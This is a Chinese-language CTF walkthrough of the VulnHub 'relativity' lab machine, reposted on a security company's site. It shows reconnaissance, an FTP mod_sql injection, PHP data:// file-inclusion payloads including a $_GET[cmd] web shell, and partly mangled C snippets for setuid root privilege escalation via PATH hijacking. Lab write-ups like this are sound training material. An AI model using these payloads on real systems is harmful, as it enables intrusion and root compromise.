网站导航

新闻资讯

当前位置:首页 > 新闻资讯

CTF靶场系列-devrandom: relativity (v1.0.1)

发布时间:2019-08-05

简要描述:

下载地址https://download.vulnhub.com/devrandom/relativity_1.0.1.zip
实战演练使用netdiscover命令查找靶机的IP使用nmap查看靶机开放的端口打开浏览器爆破目录,没找到什...

详细介绍

下载地址

https://download.vulnhub.com/devrandom/relativity_1.0.1.zip

实战演练

使用netdiscover命令查找靶机的IP

image.png使用nmap查看靶机开放的端口

image.png打开浏览器

image.png

爆破目录,没找到什么
image.png

image.png
FTP登录试试

image.png使用anonymous登录失败,不过我注意到一个banner

220 Welcome to Relativity FTP (mod_sql)

google一下,找到一个SQL注入漏洞,EXP在这里

成功进去了,这个目录就是http服务器的目录

image.png在浏览器打开这个目录

image.png查看页面源代码,好像有文件包含漏洞

image.png我尝试了一些本地文件包含,但它没有让我任何地方。为了进入下一步,我需要一些外部阅读和灵感。对于漏洞利用,我们可以利用PHP的流包装器:PHP附带了许多用于各种URL样式协议的内置包装器,用于文件系统函数,如fopen(),copy(),file_exists()和filesize(),这里面有篇文章的攻击应用

# simple RFI
page=data://text/plain, ?php system("whoami");?>

# base64 encoded RFI
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==

# mini shell
page=data://text/plain,?php system($_GET[cmd]);?>base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B
  setregid(0,0,0);
  system("/bin/bash");
  return 0;
}

#fortune.c

int main()
{
  system("chown root:root /tmp/root; chmod +s,a+rwx /tmp/root");
  return 0;
}

image.png

image.png修改环境变量

export PATH="/tmp:$PATH"


image.png


=-=好像是因为终端shell的问题,一直不行

 


推荐产品

如果您有任何问题,请跟我们联系!

联系我们

Copyright © 武汉网盾科技有限公司 版权所有 备案号:鄂ICP备2023003462号-5

地址:联系地址:湖北省武汉市东湖新技术开发区武大科技园兴业楼北楼1单元2层

在线客服 联系方式 二维码

服务热线

15527777548/18696195380

扫一扫,关注我们

关闭